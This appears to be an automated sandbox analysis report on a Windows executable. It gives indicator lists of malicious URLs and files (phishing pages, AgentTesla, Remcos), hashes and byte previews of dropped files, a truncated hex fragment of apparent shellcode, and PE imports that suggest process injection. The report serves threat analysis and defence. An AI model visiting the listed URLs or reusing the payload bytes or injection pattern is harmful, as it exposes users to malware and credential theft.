	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDd8ji5dO-2BtGjFwdkKxtwV-2BT-2FIDZLBFuspWHIOxNeRRYzjnPYwPcANsM7g6bBF5Eb-2FtBeYO84se-2BxM2-2FftOX61g3tKjw4-2BmFTEe65zPmmIV01t1qMegNLN27WQA4-2BWSzp8Exonts6yxo7jLDqmXJMwdw-3DSDkl_fylF09WDx4VRLHs1TE6by-2Fm24mY0V6PaWh-2BQeqn0Ay-2FMm-2FGvFUfwxkNWNqnFtCc1bg3RDtukBd6YTikFNr9njJPj8fPjtMTy7wESEphTN1Xt33p1RcATr-2Faa6esQ5neBHfE9PchIfWN2pGu-2FDyTo9jBl7IxKpEon9SyD5nvMkxE22jB5lqUsSt3NSAbiAi6xLdjPQNgUE2zZRGhN5aAjyw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	PO 4500005168 NIKOLA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://stef.start.page/	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://r.clk71.com/s.ashx?ms=AZ71:218551_111930&e=aundrea.leone40boarshead.com&eId=916323793&c=h&url=https3a2f2fad.doubleclick.net2fddm2ftrackclk2fN30602.5158887REACHMARKETING2fB31024378.3978245573bdc_trk_aid3d5896245733bdc_trk_cid3d2175312673bdc_lat3d3bdc_rdid3d3btag_for_child_directed_treatment3d3btfua3d3bltd3d3bdc_tdv3d1__;JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl!!KtM2tloZCg!oGzQgrCoYVGJMf6PfDh7IcY45hV0gU-qan8_64QWQnObIIvjhEDVQBbkVGXSn4d1-t_Kr3TB7F4EvB4UjY73BA$&data=05%7C02%7CReportPhish@boarshead.com%7C1f7dece21969420941fa08dc99e4dbc4%7Cb2bfef19062843c684cc966ab48412de%7C0%7C0%7C638554455432035929%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=Kp2blQOuKNOD36q+ozMhAXZ4VpLjNRlb3yoQmzJAvSU=&reserved=0	Get hash	malicious	Unknown	Browse	104.26.12.205
	http://jeezipax.co.in	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	https://singlecity.it/test/E/1.htm	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://docs.google.com/drawings/d/15tWfWcuT_MrF3j6quKPc0b_4CSv3-qwRuN5mj0BJkas/preview	Get hash	malicious	Unknown	Browse	104.26.12.205
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	104.26.12.205
	F46VBJ6Yvy.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\GkYUK8VCrO.exe
File Type:	data
Category:	dropped
Size (bytes):	266680
Entropy (8bit):	7.977471232917895
Encrypted:	false
SSDEEP:	6144:ehejQs2jX6J601aIsyvmiLubwl6+pcJLc5n/tAhHL/exo/mb//+:ecjn2mkV3yibycFenmr/r+bX+
MD5:	5EB223F71EFB99F6F2D5A5954E6C5042
SHA1:	DC085E5624BC341861050055E855CC81ED038163
SHA-256:	1EC71F7B0A255784E012D4046FD3B2A5F5B23B5FE89E4101014E8054F3D14AC5
SHA-512:	B282C6BD1A8AF9E740F0004E818851A87826EDF0F31D6B40F98F5C2A5AE30646B7B6C0E91A8F90150AEB06760A4B0FFC468177F5579F5803F4BA4C842050EC16
Malicious:	false
Reputation:	low
Preview:	EA06.......4..f.V.S.4.7:.V..iT .....k3.-Z....p.....).o.b...`/..$k.x.J.....y..J.....q$.M..it..?.W..}....Z.r9T..T.S.@.y.W....._(..4...y2.X.Rxt.y?..zr{..M0..6T..W'.Xf.JT.I?......g4.^.2...W3..$........f ...+...`.:.E.D@.....j.z}".Y..... .J..............u...ZU(5.x..i..Z....U....Q...G..J.S).....A...qQ.,.L..@...n.....R....3...j...`.AT..K ...U...'.x.J.3....R.T....ZM@.~....w.I...2......j.f.,..:..........I...<.....>.1...........VqW...g...?[P..sH.S7...F....\h.h..........c...A.vx.......Vy;jU..M..e.x...B......7....sX.....jk4..2....)w...J..).nl'.......k...k.<,_.Q.i#..-:...s.^..k.g.R.....T..;....h..1..=.M1......>............R+?.u..\|..82.l.J...0.vbk..P%.x.n..K....\...D..9.t. ..?........d...H..G..8..G{B.@.^...qz..T....j.../.1.x2u......l...l.s....;].....g....EI..y@.e..7.@._.,G...\'._.X.....bYy....x......h...(.....M/f...K)...sO..Bo.Y.g.r.0..2.A..9.Z...._k...}..[.p..k.N....kB..#..h....g.....I......7.H..x.*V.M...bVZ.[..Pkt.\|..s.qp.....X-.2....A7Z.&.....

C:\Users\user\AppData\Local\Temp\aut64C1.tmp

Download File

Process:	C:\Users\user\Desktop\GkYUK8VCrO.exe
File Type:	data
Category:	dropped
Size (bytes):	9850
Entropy (8bit):	7.599092609745426
Encrypted:	false
SSDEEP:	192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvoy6LM0nE8j3+UGxLrHJc9kUcN:I6qxwzMZy3QU9Obysvoy8EOvGxXHJ6kX
MD5:	7C9D2A1303A8B217A6D1CB061F0C130C
SHA1:	FFFE477B327679FCB57529C452E08DDC51EA3D10
SHA-256:	4FD3FE19394E7A853EFCBF7182CD78604A11C5BDB579878AE0E31691181CE368
SHA-512:	502C5B38CCE50303A7C104CEED3C69A27CBC61EEF50E6145C4D36E66C4ACDEB5C729EF8903A458DAF6CEB1CA9028473364318A498C038544AB1C397F8E73DC00
Malicious:	false
Reputation:	low
Preview:	EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........\|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.\|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.\|........}S{....7...\| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i\|v)....b.h.,@..%........9....c...\|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

C:\Users\user\AppData\Local\Temp\aut679E.tmp

Download File

Process:	C:\Users\user\Desktop\GkYUK8VCrO.exe
File Type:	data
Category:	dropped
Size (bytes):	266680
Entropy (8bit):	7.977471232917895
Encrypted:	false
SSDEEP:	6144:ehejQs2jX6J601aIsyvmiLubwl6+pcJLc5n/tAhHL/exo/mb//+:ecjn2mkV3yibycFenmr/r+bX+
MD5:	5EB223F71EFB99F6F2D5A5954E6C5042
SHA1:	DC085E5624BC341861050055E855CC81ED038163
SHA-256:	1EC71F7B0A255784E012D4046FD3B2A5F5B23B5FE89E4101014E8054F3D14AC5
SHA-512:	B282C6BD1A8AF9E740F0004E818851A87826EDF0F31D6B40F98F5C2A5AE30646B7B6C0E91A8F90150AEB06760A4B0FFC468177F5579F5803F4BA4C842050EC16
Malicious:	false
Reputation:	low
Preview:	EA06.......4..f.V.S.4.7:.V..iT .....k3.-Z....p.....).o.b...`/..$k.x.J.....y..J.....q$.M..it..?.W..}....Z.r9T..T.S.@.y.W....._(..4...y2.X.Rxt.y?..zr{..M0..6T..W'.Xf.JT.I?......g4.^.2...W3..$........f ...+...`.:.E.D@.....j.z}".Y..... .J..............u...ZU(5.x..i..Z....U....Q...G..J.S).....A...qQ.,.L..@...n.....R....3...j...`.AT..K ...U...'.x.J.3....R.T....ZM@.~....w.I...2......j.f.,..:..........I...<.....>.1...........VqW...g...?[P..sH.S7...F....\h.h..........c...A.vx.......Vy;jU..M..e.x...B......7....sX.....jk4..2....)w...J..).nl'.......k...k.<,_.Q.i#..-:...s.^..k.g.R.....T..;....h..1..=.M1......>............R+?.u..\|..82.l.J...0.vbk..P%.x.n..K....\...D..9.t. ..?........d...H..G..8..G{B.@.^...qz..T....j.../.1.x2u......l...l.s....;].....g....EI..y@.e..7.@._.,G...\'._.X.....bYy....x......h...(.....M/f...K)...sO..Bo.Y.g.r.0..2.A..9.Z...._k...}..[.p..k.N....kB..#..h....g.....I......7.H..x.*V.M...bVZ.[..Pkt.\|..s.qp.....X-.2....A7Z.&.....

C:\Users\user\AppData\Local\Temp\aut67CE.tmp

Download File

Process:	C:\Users\user\Desktop\GkYUK8VCrO.exe
File Type:	data
Category:	dropped
Size (bytes):	9850
Entropy (8bit):	7.599092609745426
Encrypted:	false
SSDEEP:	192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvoy6LM0nE8j3+UGxLrHJc9kUcN:I6qxwzMZy3QU9Obysvoy8EOvGxXHJ6kX
MD5:	7C9D2A1303A8B217A6D1CB061F0C130C
SHA1:	FFFE477B327679FCB57529C452E08DDC51EA3D10
SHA-256:	4FD3FE19394E7A853EFCBF7182CD78604A11C5BDB579878AE0E31691181CE368
SHA-512:	502C5B38CCE50303A7C104CEED3C69A27CBC61EEF50E6145C4D36E66C4ACDEB5C729EF8903A458DAF6CEB1CA9028473364318A498C038544AB1C397F8E73DC00
Malicious:	false
Reputation:	low
Preview:	EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........\|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.\|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.\|........}S{....7...\| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i\|v)....b.h.,@..%........9....c...\|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

C:\Users\user\AppData\Local\Temp\subbase

Download File

Process:	C:\Users\user\Desktop\GkYUK8VCrO.exe
File Type:	ASCII text, with very long lines (28756), with no line terminators
Category:	dropped
Size (bytes):	28756
Entropy (8bit):	3.590881180643552
Encrypted:	false
SSDEEP:	768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IC6bd4vfF3if6gyu+:miTZ+2QoioGRk6ZklputwjpjBkCiw2RS
MD5:	305BB017AB99D5316C314D5816BEC805
SHA1:	77097732DD6DCF41936BF4EE3F2CCBCA4C7D105E
SHA-256:	08835C865FBD87849FDD4C6F4ADBDD7429A9B8129669A3F8820B39795A3B34A3
SHA-512:	965E4DFA1D97A754365E4C257129687CD5EFF90C17AC4B28EB3A18BFF44D355B9DC6F448016B1D8ABD4D7BECCADC45D5C6D75FC5A694990368E9C1AA46B89B50
Malicious:	false
Preview:	8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

C:\Users\user\AppData\Local\Temp\vaccinators

Download File

Process:	C:\Users\user\Desktop\GkYUK8VCrO.exe
File Type:	data
Category:	dropped
Size (bytes):	267776
Entropy (8bit):	7.852716166683299
Encrypted:	false
SSDEEP:	6144:sFMKoPN6TByDlIHahZ22Bo+EJOSDbc7a9UUsAU2ZMgJx8w75mwdu3QWQ:SMvcTByDlIHIZ22+Jvc7LUlfZMg3z5mu
MD5:	AC28303061B7C22A484B91842E1B59F9
SHA1:	343A2F2550ACE32A661B22EB13264FD3C9770803
SHA-256:	A559ABB286EB3A67054546CFD170E2DB85267F35DC03F80FCFCC927591876FE9
SHA-512:	6408C7CA15CC7FCCA7DA853BC3F458CF4FD5B53075074A2B068E5B3DC94D4004C4016BDE492F962EF80AE36C9D9D11D7BB4B885EB6B3C55F81B1A5205883E765
Malicious:	false
Preview:	...JAYJVHNAM..EV.YJBYJVL.AMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1E.AYJLF.XL.H.x.D..x.09v<<.+P(v"8$,6>v.+a?,_e?/y...j;#*$cT<OrAYJBYJV$^.`u@.(m(.<u;.2\|b2'.4.?R..'a'.0m<.O.'.'xa74J=.?.zX;.0.4pz1(a?.3.X&>m(.<YJVLNAMY1EVAYJBY..(AMY1..AY.C]J".N.MY1EVAYJ.YiWGOHMY.DVA#HBYJVLa.MY1UVAY.CYJV.NA]Y1ETAYOBYJVLNAHY1EVAYJB9NVLJAM..GVCYJ.YJFLNQMY1EFAYZBYJVLNQMY1EVAYJBYJ.YLA.Y1EV![J.KVLNAMY1EVAYJBYJVLNAMY1EVA..CYVVLNAMY1EVAYJBYJVLNAMY1EVAYJ.THV.NAMY1EVAYJBY.WL.@MY1EVAYJBYJVLNAMY1EVAYJBYJx8+99Y1EN.XJBIJVL.@MY5EVAYJBYJVLNAMY.EV!w8&8>7LN. Y1E.@YJ,YJV.OAMY1EVAYJBYJV.NA.wU$" YJB.zVLNaOY1SVAY@@YJVLNAMY1EVAY.BY.x>=3.Y1E..XJB9HVL.@MY.GVAYJBYJVLNAMYqEV.YJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLNAMY1EVAYJBYJVLN

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.711463104926535
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	GkYUK8VCrO.exe
File size:	1'623'552 bytes
MD5:	7d50650cd2ba63482d4caf875ae65a8e
SHA1:	037e5a7f82d5c436f744e5b7475f6264c32e6519
SHA256:	b54b494944a8b5268e3d3190c5a45af28afdada7eb0fc85fece3c22e2d31b3f1
SHA512:	cc245b8725f43a80a80e25ed3b266293592abda1f451cf80b30b42f90cac4b1898200673b2c87b58c0bcb022d4eb1bfa7a4cbc6ab2f46a3f6ec113842c7fcbb7
SSDEEP:	24576:kAHnh+eWsN3skA4RV1Hom2KXMmHa5rS/G23VGNGfi8mBLWUK5:zh+ZkldoPK8Ya5+/x3VGNJZy
TLSH:	19757C127753C4BEFE7F82F2191D75608A34BD289427582F13EB794597B42A0F12B3A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	0404961c16d6662e

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66825290 [Mon Jul 1 06:54:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F8818BA656Dh
jmp 00007F8818B99324h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F8818B994AAh
cmp edi, eax
jc 00007F8818B9980Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F8818B994A9h
rep movsb
jmp 00007F8818B997BCh
cmp ecx, 00000080h
jc 00007F8818B99674h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F8818B994B0h
bt dword ptr [004BF324h], 01h
jc 00007F8818B99980h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F8818B9964Dh
test edi, 00000003h
jne 00007F8818B9965Eh
test esi, 00000003h
jne 00007F8818B9963Dh
bt edi, 02h
jnc 00007F8818B994AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F8818B994B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F8818B99505h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0xc1f0c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18a000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0xc1f0c	0xc2000	01bb6f525b158d720ada14f00ea60dd9	False	0.48596443097615977	data	6.471854093469766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18a000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc8700	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc8828	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8950	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	Great Britain	0.02376320383465988
RT_ICON	0x10a978	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	Great Britain	0.07906956110256713
RT_ICON	0x11b1a0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	Great Britain	0.17179945343704014
RT_ICON	0x124648	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	Great Britain	0.21233826247689463
RT_ICON	0x129ad0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	Great Britain	0.17873169579593765
RT_ICON	0x12dcf8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.3057053941908714
RT_ICON	0x1302a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.34263602251407127
RT_ICON	0x131348	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	Great Britain	0.48114754098360657
RT_ICON	0x131cd0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.574468085106383
RT_MENU	0x132138	0x50	data	English	Great Britain	0.9
RT_STRING	0x132188	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0x13271c	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0x132da8	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0x133238	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0x133834	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0x133e90	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0x1342f8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0x134450	0x5552e	data			1.0003319160138031
RT_GROUP_ICON	0x189980	0x84	data	English	Great Britain	0.7196969696969697
RT_GROUP_ICON	0x189a04	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x189a18	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x189a2c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x189a40	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x189b1c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
